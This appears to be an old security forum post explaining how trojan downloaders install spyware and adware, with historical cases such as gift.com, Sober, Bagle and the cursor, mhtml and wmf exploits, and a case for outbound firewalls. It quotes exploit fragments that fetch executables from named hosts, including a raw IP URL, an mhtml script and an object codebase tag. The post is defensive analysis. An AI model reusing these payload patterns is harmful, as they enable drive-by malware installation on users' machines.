Ask people how adware and spyware get installed, and many may not know about trojan droppers and downloaders, or understand how they work.
An acquaintance took her computer to a shop to remove Spy Sheriff. She found it hard to realize that it was a downloader, and not Windows, that caused the "you are infected" notice to display.
Most malware today is created to make money. This is achieved by surreptitiously installing spyware, adware, keyloggers, etc, and is often accomplished by means of a trojan "downloader." This file, once successfully installed, connects out to the internet to download malware of all types, and often, more downloaders to continue the cycle.
Sunbelt currently lists 405 Trojan Downloader threats.
If installed, trojans can still be blocked from carrying out their payload by a firewall with outbound protection,
• which alerts to any application attempting to connect out which has not previously been authorized to do so; or,
• which blocks an application by a specific rule.
Some examples follow.
Infection via email attachment: gift.comWhen executed, gift.com copies itself to %windir% as
winrpc.exeand attempts to connect out:
_______________________________________________________
If it connects out, it downloads
drsmartload.exe, the workhorse downloader
of this exploit. This trojan has been seen in a number of exploits:
_______________________________________________________
_______________________________________________________
If it connects out successfully, a few "gifts" will be received:
_______________________________________________________
Infection via email attachment: W32.Sober.QIf the user executes the email attachment, the worm copies itself as Services.exe, and first attempts to connect out to a time server via port 37. There is a legitmate services.exe in Win2K/XP, but the firewall checks the application's MD5, sees a mis-match, and alerts:
_______________________________________________________
_______________________________________________________
Trojan piggy-backed on a program: CodecLinks on web sites to a Codec. When the codec.exe is downloaded/installed,
the file also connects out via Windows Explorer.exe to download and install malware:
_______________________________________________________
Attempt to disable Firewall: BagleQuote from a post on another forum:
I did a booboo by starting to open a file called 06_05_2005.exe,
when i realized it I stopped. But it has taken my firewall away,...
The poster didn't say if he had password protection enabled,which will block
an attempt to disable the firewall service, as many Bagle variants try to do.
Note the spoofed notepad icon:
_______________________________________________________
Remote Code Execution: Animated Cursor ExploitAn animated cursor file is cached, and downloads
win32.exe, which connects out to the internet:
GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec-
HTTP://195.225.177.33/vx/win32.exe
_______________________________________________________
Remote Code Execution: mhtml exploitUsing a fake .chm file,
Trojan.Downloader.Small, to download the trojan
load.exeClassic case of one of the "loader" downloaders calling out for more downloaders
SCRIPT LANGUAGE="JavaScript"
obj = "<object data=\"ms-its:mhtml:file";
hxxp: / / traffweb.biz/dl/adv799/x.chm::/load.exe
_______________________________________________________
_______________________________________________________
Remote Code Execution: Browser Helper Object ExploitIE Plugin connects to a web site, exfol.com. The site remotely downloads a Trojan,
eins008.exe,
Trojan-Downloader-Exfol:
object id="sClass" classid="CLSID:444B911E-6E55-4a11-B3E9-0D3E21AE0437"
codebase="http://www.exfol.com/v/1/i/eins008.exe" object
_______________________________________________________
Remote Code Execution: wmf exploitThe wmf file downloads ioo.exe, detected by Trend Micro as TROJ_DLOADER.BFK. The said action further exposes the affected system to malicious threats. It then saves its downloaded malware as voi{Random number}.EXE one of which is voi548.exe,
Trojan.Downloader.Win32.Agent. In order to see ioo.exe, I took a screen shot of it being blocked. Otherwise, it downloads so quickly in the background that you miss it:
iframe src="wmf_exp.wmf" iframe
_______________________________________________________
_______________________________________________________
_______________________________________________________
If successful, this trojan begins the installation of Spy Sheriff:
_______________________________________________________
_______________________________________________________
_______________________________________________________
All of the above exploits have been patched, yet they continue to appear, especially in multiple-exploit malware embedded in websites, and, unfortunately, continue to infect unaware users.
Many may feel they are already well-protected from malware installing/executing.
However, if one is concerned about an unexpected, unforseen (dare I say, "zero-day") occurrence, a firewall with outbound protection - or one of the newer products with application-outbound protection - will help contain the damage locally, and also prevent smtp email engines from sending out to harvested email addresses to infect others.
______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."--Bruce Schneier